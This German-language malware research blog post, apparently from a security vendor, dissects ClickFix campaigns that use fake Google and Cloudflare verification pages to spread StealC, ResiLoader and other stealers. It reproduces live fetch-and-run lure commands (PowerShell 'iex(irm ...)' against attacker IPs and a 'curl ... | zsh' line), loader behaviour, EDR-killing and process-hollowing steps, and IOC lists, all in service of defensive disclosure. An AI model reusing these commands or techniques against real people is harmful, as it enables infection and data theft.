Gefälschte Verifizierungsseiten von Google und Cloudflare verbreiten mehrere Malware-Familien

| 2. Juli 2026
Gefälschte Verifizierungsseiten von Google und Cloudflare verbreiten mehrere Malware-Familien

ClickFix-Angriffe, bei denen Nutzer dazu verleitet werden, selbst schädliche Befehle auszuführen, entwickeln sich ständig weiter. Bei dieser neuesten Kampagne werden gefälschte Verifizierungsseiten von Google und Cloudflare verwendet, um die Opfer dazu zu bringen, ihre eigenen Geräte zu infizieren.

Schon ein einziger Fehler kann dazu führen, dass Malware installiert wird, die Passwörter und andere sensible Daten stiehlt, Angreifern Fernzugriff auf Ihren Computer gewährt oder weitere Malware herunterlädt, die die vollständige Kontrolle über Ihr System übernehmen kann.

Wir haben mehrere Kampagnen aufgedeckt, bei denen dieselbe Infrastruktur zur Verbreitung von Malware genutzt wurde, darunter HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport und ein auf Rust basierender Stealer.

In einer Infektionskette lädt eine mit einem Trojaner versehene Version der legitimen Messaging-App „Franz“ einen bislang nicht dokumentierten Loader namens „ResiLoader“ herunter, der die Sicherheitssoftware deaktiviert, bevor er den Infostealer „StealC“ einsetzt.

Bevor wir uns mit den technischen Details befassen, erfahren Sie hier, wie Sie vermeiden können, das nächste Opfer zu werden.

Wie man sicher bleibt

ClickFix-Angriffe basieren darauf, Sie dazu zu bringen, Befehle selbst auszuführen. Der sicherste Ansatz ist ganz einfach:

  • Kopieren und führen Sie niemals Befehle von einer Website aus, es sei denn, Sie befolgen Anweisungen aus einer vertrauenswürdigen Quelle und wissen genau, was der Befehl bewirkt.
  • Seien Sie vorsichtig bei Verifizierungsseiten. Google, Cloudflare, Microsoft und andere seriöse Dienste werden Sie niemals auffordern, PowerShell-Befehle in Windows einzufügen, Windows beweisen, dass Sie ein Mensch sind, oder um ein Problem zu beheben.
  • Lassen Sie sich nicht von der Dringlichkeit unter Druck setzen. Gefälschte Verifizierungsseiten nutzen oft Countdown-Timer, Besucherzähler oder Warnmeldungen, um Sie zu einem schnellen Handeln zu drängen.
  • Halten Sie Ihre Sicherheitssoftware auf dem neuesten Stand. Echtzeitschutz und Webschutz können dazu beitragen, schädliche Websites zu blockieren, bevor Sie diese aufrufen.
  • Hinterfragen Sie unerwartete technische Anweisungen. Wenn Sie auf einer Website aufgefordert werden, PowerShell, die Eingabeaufforderung oder das Terminal zu öffnen, halten Sie inne und überprüfen Sie die Anweisungen über die offiziellen Supportkanäle des Unternehmens.

Profi-Tipp: Malwarebytes Browser Guard kann Sie warnen, wenn eine Website versucht, Inhalte in Ihre Zwischenablage zu kopieren – ein gängiger Trick, der von ClickFix-Seiten verwendet wird.

Technische Analyse

Die in dieser Untersuchung analysierten Kampagnen sind seit mindestens Ende 2025 aktiv und nutzen eine Vielzahl gefälschter Google- und Cloudflare-Seiten, um Malware zu verbreiten. Obwohl sich die Köder unterscheiden, basieren sie größtenteils auf derselben Infrastruktur und Infektionskette, wobei die Angreifer kontinuierlich neue Verbreitungsmethoden und Payloads testen.

Verschiedene Köder, ein Ziel

Die meisten Kampagnen weisen mehrere Gemeinsamkeiten auf:

  • Verwendung des Ordners C:\ProgramData\Zooms um spätere Phasen zu extrahieren
  • PowerShell-ClickFix-Befehle, die ähnlichen Mustern folgen
  • Verwendung von Cloudflare-R2-Buckets zur Bereitstellung von Nutzdaten
  • Von ASN Dedik Services Limited gehostete IP-Adressen
  • HTML-Antworten, die ausschließlich den Ausdruck "hehe"

Diese Indikatoren haben sich im Laufe der Zeit verändert, sodass sie nicht in jeder Infektionskette vorkommen. Die Kampagnen entwickeln sich ständig weiter, wobei regelmäßig neue Payloads und Verbreitungsmethoden eingeführt werden. So wird beispielsweise in einigen Fällen die IP-Adresse anstelle von Buckets direkt für die Verbreitung der Payloads genutzt.

Der vom Benutzer kopierte endgültige Befehl entspricht in der Regel diesem Muster: 

powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”

Der Port und der Pfad sind in den analysierten Fällen nicht immer vorhanden; die Ports sind zufällig, aber einige der verwendeten Ports sind: 6600, 9900, 5506, 7895, 7493, 149, 8442. 

Zur Ausführung dieser Befehle werden mehrere ClickFix-bezogene Vorlagen verwendet, die hauptsächlich mit Google und Cloudflare in Zusammenhang stehen. Wir haben außerdem festgestellt, dass der PowerShell-Befehl in einigen Fällen über das IClickFix-Framework verbreitet wurde. 

Wir haben festgestellt, dass diese ClickFix-Kampagnen über folgende Kanäle verbreitet wurden:

  • Alte Websites, deren Laufzeit wahrscheinlich abgelaufen ist und die von dem/den Täter(n) zurückgekauft wurden.  
  • CloudFlare Pages (.pages.dev Domains). 
  • Gehackte Websites. 
  • Gefälschte Dienste, beispielsweise im Zusammenhang mit QR-Codes oder dem Zugriff auf Dateien im Internet. 

Google ClickFix lockt 

Die Verantwortlichen hinter diesen Kampagnen nutzen verschiedene Google-bezogene HTML-Seiten und -Kits. 

Ein Köder täuscht eine Google-reCAPTCHA-Verifizierung vor. Die Seiten werden unter zufälligen URLs gehostet, die gefälschte oder schädliche Inhalte anzeigen. Bei diesen Domains handelt es sich oft um ältere Registrierungen, die seit Kurzem auf neue IP-Adressen verweisen, was darauf hindeutet, dass sie für diese Kampagne umfunktioniert wurden.

Einige dieser Seiten enthalten URL-Parameter wie beispielsweise „zoneid“, „cost“, „device“, „country“ und „clickid“, zum Beispiel: 

  • /conf/captcha.html?zoneid=10420852 
  • /wincapbot/nobot.html 
  • /xmr/trkuste.php?zone=5327134 
  • bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop 
„Manuelle Überprüfung erforderlich“ – ClickFix-Seite
„Manuelle Überprüfung erforderlich“ – ClickFix-Seite
„Manuelle Überprüfung erforderlich“ – ClickFix-Seite

In diesem Fall sind die Funktionen im Zusammenhang mit ClickFix in der Klasse implementiert CustomCaptcha. Der Befehl liegt im Klartext vor, ohne jegliche Verschleierung. 

Die Methode „StartVerification“ in der Klasse „CustomCaptcha“
Die Methode „StartVerification“ in der Klasse „CustomCaptcha“

Eine weitere Bereitstellungsmethode nutzt Cloudflare Pages, das auf .pages.dev Subdomains.

„Bitte bestätigen Sie, dass Sie ein Mensch sind“ – ClickFix-Seite
„Bitte bestätigen Sie, dass Sie ein Mensch sind“ – ClickFix-Seite

In diesem Fall wird die HTML-Seite verschleiert, indem mehrere Variablen deklariert und mit einer XOR-Verschlüsselung versehen werden. Der entschlüsselte Code heißt SECURITY GATEWAY und es setzt sich aus den Funktionen zusammen GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenControllerund PanelController.  

Der Code ermöglicht es den Angreifern, den Befehl entweder aus der Ferne oder lokal abzurufen. In diesem Beispiel ist der schädliche PowerShell-Befehl lokal gespeichert.

Der im Code „SECURITY GATEWAY“ deklarierte PowerShell-Befehl
Der im Code „SECURITY GATEWAY“ deklarierte PowerShell-Befehl

Wir haben außerdem festgestellt, dass einige dieser Domains in der Vergangenheit bereits einen anderen Köder verbreitet haben, der in diesem Fall mit einer nicht autorisierten Google-Anmeldung in Verbindung stand. Bei diesem ClickFix-Köder wird der Nutzer aufgefordert, den schädlichen Befehl zu kopieren und einzufügen, um sein Gerät als primäres Gerät festzulegen. 

„Neue Anmeldung mit vertrauenswürdigem Token“ – ClickFix-Seite
„Neue Anmeldung mit vertrauenswürdigem Token“ – ClickFix-Seite

Das Interessante an diesem ClickFix-Kit ist, dass es, wie in den Kommentaren beschrieben, über eine „Genehmigungsschranke“ verfügt und dass der Angreifer manuell aus der Liste auswählen muss, welchen Befehl der Benutzer ausführen soll. 

Anmerkungen zum Bausatz und zum „Freigabeprozess“
Anmerkungen zum Bausatz und zum „Freigabeprozess“
Anmerkungen zum Bausatz und zum „Freigabeprozess“

In jüngeren Kampagnen haben wir einen ClickFix-Köder im Zusammenhang mit Google Meet entdeckt, bei dem ein bösartiger Befehl kopiert und eingefügt werden muss, um Audio-Probleme zu beheben. 

Der „Audio-Treiber reparieren“-Köder von Meet ClickFix
Der Google Meet ClickFix-Köder „Audio-Treiber reparieren“

In den analysierten Fällen war der Endpunkt /api/driver-clipboard.php gab den folgenden schädlichen Befehl zurück:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} 

Sonstige Köder 

Die Drahtzieher dieser Kampagne nutzen verschiedene Tools und Köder, die größtenteils mit Google in Verbindung stehen. Wir haben jedoch auch andere Köder entdeckt, die Befehle kopiert haben, die mit derselben Infrastruktur in Zusammenhang stehen. 

Die Angreifer hinter diesen Kampagnen kompromittieren zudem mehrere Websites, wobei sie verschiedene Vorlagen im Zusammenhang mit dem CloudFlare-ClickFix-Köder verwenden. 

„Bitte bestätigen Sie, dass Sie ein Mensch sind“ – ClickFix-Seiten
„Bitte bestätigen Sie, dass Sie ein Mensch sind“ – ClickFix-Seiten
„Bitte bestätigen Sie, dass Sie ein Mensch sind“ – ClickFix-Seiten

Wir haben mehrere Vorlagen identifiziert, die für CloudFlare-Seiten verwendet werden. Der Befehl liegt in den analysierten Fällen im Klartext vor oder ist in einigen Fällen verschleiert. 

Einige der HTML-Seiten von CloudFlare ClickFix 
Einige der HTML-Seiten von CloudFlare ClickFix 
Einige der HTML-Seiten von CloudFlare ClickFix 
Einige der HTML-Seiten von CloudFlare ClickFix 

Wir haben außerdem einige speziell erstellte Websites mit gefälschten Diensten entdeckt. So zeigt beispielsweise die Website „My QR Generator“ einen verschleierten QR-Code an und fordert den Nutzer auf, einen PowerShell-Befehl auszuführen, um zu bestätigen, dass er kein Roboter ist. 

„QR-Code“ – ClickFix-Lure-Seite 
„QR-Code“ – ClickFix-Lure-Seite 

In diesem Fall ist der Befehl in Base-64 kodiert: 

Dekodierter PowerShell-Befehl
Dekodierter PowerShell-Befehl

PowerShell-Downloader 

Der vom Benutzer ausgeführte Befehl „ClickFix“ entschlüsselt ein Skript und speichert es unter dem Namen tmp{4 char}.tmp.ps1

Wir haben mehrere Varianten dieses Skripts entdeckt, doch die neuesten Versionen verhalten sich wie folgt: 

  • Erstellen Sie den Ordner C:\ProgramData\Zooms
  • Laden Sie die nächste Stufe aus einem CloudFlare-Bucket herunter und speichern Sie sie in C:\ProgramData\Zooms. In einigen Varianten des Skripts wird die nächste Stufe direkt von einer IP-Adresse heruntergeladen. 
  • Senden Sie die Informationen zum betroffenen Rechner an http://{IP}/dl-callback. In einigen Varianten des Drehbuchs fehlt dieser Teil. 
Abgelegt: PowerShell-Skript
Abgelegt: PowerShell-Skript

Die Angreifer hinter diesen Kampagnen setzen eine Vielzahl unterschiedlicher Payloads ein. Die Kampagnen verbreiten eine breite Palette an Payloads. Die folgende Tabelle fasst einige der heruntergeladenen Dateinamen und die dadurch installierte Malware zusammen. In vielen der analysierten Fälle wurde die endgültige Payload über DLL-Hijacking verbreitet, wie wir später auch beim StealC-Stealer sehen werden. 

Datei verteilt Verbreitung von Malware 
libEGL.zip, Safe-1.zip Mit Trojanern infizierte Electron-App, ResiLoader und StealC 
Test.msi Deno Loader und PowerShell Stealer 
arworks.zip Amatera Stealer 
water-night.zip Remus Stealer 
Setup.msi, Invintrum_first.msi NetSupport 
traffic1.msi CastleLoader 
ibrowser.exe Rostdieb 

Wir haben einen neuen Loader namens „ResiLoader“ analysiert, der letztendlich „StealC“ verbreitet. Außerdem haben wir festgestellt, dass der Angreifer in den jüngsten Kampagnen mittlerweile Deno einsetzt, um am Ende einen in PowerShell entwickelten Stealer zu verbreiten; die Analyse dieser Infektionskette könnte Gegenstand eines zukünftigen Blogbeitrags sein. 

Die mit einem Trojaner infizierte Electron-App lädt ResiLoader herunter

In diesem Fall wurde die ZIP-Datei von folgender Adresse heruntergeladen: 

  • pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip 

Nach der Extraktion in: 

  • C:\ProgramData\Zooms\libEGL.zip_ext

Die ZIP-Datei enthält eine mit einem Trojaner infizierte Version der Open-Source-Messaging-App „Franz“: 

Die mit einem Trojaner infizierte App „Franz“, die zum Herunterladen von ResiLoader verwendet wurde
Die mit einem Trojaner infizierte App „Franz“, die zum Herunterladen von ResiLoader verwendet wurde

Der Schadcode ist in der index.js Datei: 

Der verschleierte Code in der mit einer Hintertür versehenen App
Der verschleierte Code in der mit einer Hintertür versehenen App

Der Downloader führt die folgenden Vorgänge aus: 

  • Dekodiere die Zeichenfolgen mit der Funktion HC()
  • Lesevorgänge readme.txt, erwartet einen Kampagnenschlüssel der Form AAAA-BBBB, gibt ihn als Array von Tokens zurück. In diesem Fall lautet der Name resiloader-1 Und deshalb nennen wir die heruntergeladene DLL „ResiLoader“. 
  • Lesevorgänge %APPDATA%\setup.txt; falls nicht vorhanden, wird eine zufällige Zeichenkette mit 8 Zeichen generiert und gespeichert.  
  • Persistenz erreichen mithilfe von app.setLoginItemSettings
  • Sendet eine POST-Anfrage an https[:]//completstep[.]com/api/ und die JSON-Antwort aufbereiten
    • Wenn task.e ist vorhanden, wird es ausgeführt eval(task.e); dadurch kann der Angreifer beliebigen JavaScript-Code ausführen. 
    • Wenn task.files ist vorhanden, erstellen %TEMP%\<Date.now()>\, jede Datei entschlüsseln und schreiben; falls ein Dateiname auf .exe, führen Sie es über child_process.exec

In unserem Fall haben wir eine ZIP-Datei erhalten, die ein DLL-Hijacking von ssh-add.exe

{"task":{"name":"JUNE18USY","files":{ 

   "msys-2.0.dll":"<base64>", 

   "msys-crypto-3.dll":"<base64>", 

   "msys-gcc_s-seh-1.dll":"<base64>", 

   "ssh-add.exe":"<base64>" }}}

Anschließend wurde die ausführbare Datei mit folgendem Befehl ausgeführt: 

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" 

ResiLoader

Die msys-crypto-3.dll ist ein verschleierter .NET NativeAOT loader der eine AV/EDR-Umgehung mithilfe einer BYOD-Technik implementiert, Persistenz erlangt und schließlich den Stealer „StealC“ lädt. Wir konnten keine konkrete Zuordnung für diesen Loader finden und haben ihn daher auf Grundlage der in früheren Versionen vorhandenen Zeichenfolge „ResiLoader“ genannt. readme.txt

Der Loader enthält mehrere Zeichenfolgen, von denen einige im Klartext und andere verschlüsselt vorliegen. Nach der Entschlüsselung der Zeichenfolgen lässt sich ein vollständiges Bild von der Funktionsweise des ResiLoaders gewinnen. 

MANPO: ReadModule len=... 

MANPO: magicOffset=...
… 

PERS: FAIL all file copies failed, skipping run key 

PERS: FAIL both HKLM and HKCU Run key writes failed 
… 

RUNPE: CreateProcess failed 

RUNPE: PEB patched 

RUNPE: VirtualAllocEx failed 
… 

POST: RunForever exited (unexpected) 

POST: entering RunForever 

POST: hollow=

Der Lader führt die folgenden Vorgänge aus: 

  • Extrahieren Sie den kodierten Blob, der zwei Nutzdaten enthält, indem Sie den Marker auslesen AtLorenBase sowie die Länge des verschlüsselten Blobs. Anschließend decodiert es den Blob und entschlüsselt den Treiber pcdhost.sys (OPSWAT  
    (AppRemover-Treiber) und die StealC-Nutzlast mithilfe eines benutzerdefinierten Entschlüsselungsalgorithmus.  
  • Beenden Sie mithilfe des entfernten Treibers mehr als 140 Prozesse, die mit EDR-/AV-Prozessen in Verbindung stehen. 
  • UAC-Umgehung durchführen über ICMLuaUtil Erweiterte COM-Schnittstelle. 
  • Ordner erstellen C:\ProgramData\Google Update, sich selbst kopieren; Persistenz mithilfe des RUN-Registrierungsschlüssels hinzufügen 
  • cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe 

Schließlich führt der Loader das „Process Hollowing“ des Prozesses durch ServiceModelReg.exe um den StealC-Stealer auszuführen. 

IOCs 

Hash 

72907d0ca3258365838626f6a8d993a6: ResiLoader-DLL 

0234E3188F2883A438B3F2BEAB7A78B2: StealC 

6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus 

206ce339febca0c3bcc850f42595fc63: Amatera Stealer 

eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT 

b8d53740024d126cb55f83854335a4ab: Rostdieb 

Domänen 

ClickFix-Seiten verteilen: 

onegeekworld[.]com 

thefirmos[.]com 

antibotv3[.]com 

centralwildcats[.]com 

cloud.antibotv3[.]com 

cloudautosolutions[.]com 

sunseekersupply[.]com 

123clocks[.]com 

orcanegames[.]com 

rwmonitoring[.]com 

100furniture[.]com 

nepalcharchaa[.]com 

p-floribunds.pages[.]dev 

pg-altirade2.pages[.]dev 

pg-cordivant-m6.pages[.]dev 

g-luminence.pages[.]dev 

generator-qrcode[.]online 

regdev-google[.]com 

khosla[.]capital 

eorgke09054909j[.]com 

dropboxi[.]com 

Für die Verteilung der Nutzdaten verwendete CloudFlare-Buckets

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-620528e2dc874e16937673265aa23d39.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-9682d5896df841679c5a17eb41273f89.r2[.]dev 

pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev 

pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

unitedstateverif[.]com: Verteilung der Nutzlast 

bigflaredefence[.]com: Verteilung der Nutzlast 

popularcard[.]shop: Rust Stealer C2 

xzz[.]proxygrid[.]cc: Amatera Stealer C2 

completstep[.]com: Loader C2 

eventlogerps1[.]ink: Deno Loader  

be231ro963[.]com: Deno Loader  

IPs 

Für die Verteilung der Nutzdaten verwendete IP-Adresse

151.240.151[.]126 

85.239.149[.]16 

85.239.149[.]40 

93.152.224[.]29 

151.240.151[.]46 

93.152.224[.]167 

85.239.149[.]78 

192.69.195[.]131 

135.181.171[.]40 

94.26.83[.]206 

91.92.34[.]128 

85.239.144[.]31 

93.152.224[.]39 

94.26.90[.]112 

146.19.248[.]120: StealC C2 

Danksagungen  

Über den Autor

Gabriele ist Malware-Forschungsingenieur und liebt es, Malware zu bekämpfen. Wenn er gerade nicht damit beschäftigt ist, genießt er die Natur, Kunst und Tiere.